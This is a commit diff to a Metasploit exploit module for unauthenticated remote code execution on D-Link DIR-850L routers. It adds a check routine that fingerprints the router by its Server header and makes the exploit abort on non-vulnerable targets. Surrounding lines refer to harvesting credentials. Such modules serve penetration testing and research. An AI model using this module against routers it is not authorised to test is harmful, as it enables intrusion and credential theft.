Update dlink_850l_unauth_exec.rb

2017-11-04 07:58:13 -04:00 · 2017-11-04 07:58:13 -04:00 · 84599ed3fc
parent cddec8ca6c
commit 84599ed3fc
1 changed files with 28 additions and 0 deletions
--- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb
@ -55,6 +55,28 @@ class MetasploitModule < Msf::Exploit::Remote
      ])
  end
  
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/',
+        'method' => 'GET'
+        })
+      if res && res.headers['Server']
+        auth = res.headers['Server']
+        if auth =~ /DIR-850L/
+          if auth =~ /WEBACCESS\/1\.0/
+            return Exploit::CheckCode::Safe
+          else
+            return Exploit::CheckCode::Detected
+          end
+        end
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Unknown
+  end
+
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
@ -197,6 +219,12 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    
+    print_status("#{peer} - Connecting to target...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
+    end
+    
    #
    # Information Retrieval, obtains creds and logs in
    #